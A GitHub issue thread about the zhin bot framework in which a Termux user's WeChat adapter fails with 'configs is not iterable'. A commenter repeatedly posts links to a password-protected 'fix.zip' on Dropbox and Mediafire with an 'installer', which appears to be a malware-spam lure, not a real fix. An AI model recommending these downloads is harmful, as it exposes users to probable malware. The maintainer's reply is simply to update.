### ISSUE TITLE
注册adapter失败

### ISSUE THREAD

**Issue by xiaoshuye147** [zhinjs/zhin#142]
Envirment: Termux.
按照教程失败，修改@zhinjs/adapter-wechat为@zhinjs/wechat后
npm install @zhinjs/wechat成功，
但adapter.add @zhinjs/wechat失败，错误日志:
~/zhin-app $ npx zhin
[2024-08-26T11:20:27.710] [INFO] [zhin] - plugin：指令解析器 loaded。
[2024-08-26T11:20:27.713] [INFO] [zhin] - plugin：echo loaded。
[2024-08-26T11:20:27.719] [INFO] [zhin] - plugin：hmr loaded。
[2024-08-26T11:20:27.720] [INFO] [zhin] - plugin：zhin管理 loaded。
[2024-08-26T11:20:27.721] [INFO] [zhin] - plugin：setup loaded。
[2024-08-26T11:20:27.847] [WARN] [zhin] - load adapter "@zhinjs/wechat" failed TypeError: configs is not iterable
    at Adapter.initBot (/data/data/com.termux/files/home/zhin-app/node_modules/@zhinjs/wechat/lib/index.js:21:26)
    at Adapter.emit (node:events:520:28)
    at Adapter.mount (/data/data/com.termux/files/home/zhin-app/node_modules/@zhinjs/core/lib/adapter.js:74:14)
    at Proxy.loadAdapter (/data/data/com.termux/files/home/zhin-app/node_modules/@zhinjs/core/lib/app.js:320:25)
    at Proxy.initAdapter (/data/data/com.termux/files/home/zhin-app/node_modules/@zhinjs/core/lib/app.js:102:18)
    at Proxy.start (/data/data/com.termux/files/home/zhin-app/node_modules/@zhinjs/core/lib/app.js:298:14)
    at /data/data/com.termux/files/home/zhin-app/node_modules/zhin/lib/start.js:28:9
    at Object.<anonymous> (/data/data/com.termux/files/home/zhin-app/node_modules/zhin/lib/start.js:29:3)
    at Module._compile (node:internal/modules/cjs/loader:1504:14)
    at Module._extensions..js (node:internal/modules/cjs/loader:1588:10)

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by xiaoshuye147** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

emmm , the websize does not works

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaoshuye147** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

thank u , but that's my mistake ,i forgot to tell you i'm running in termux, and this way won't work.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaoshuye147** [comment]
but the archivement is arm64 not x86-64.

**Comment by lc-cn** [comment]
use newest version
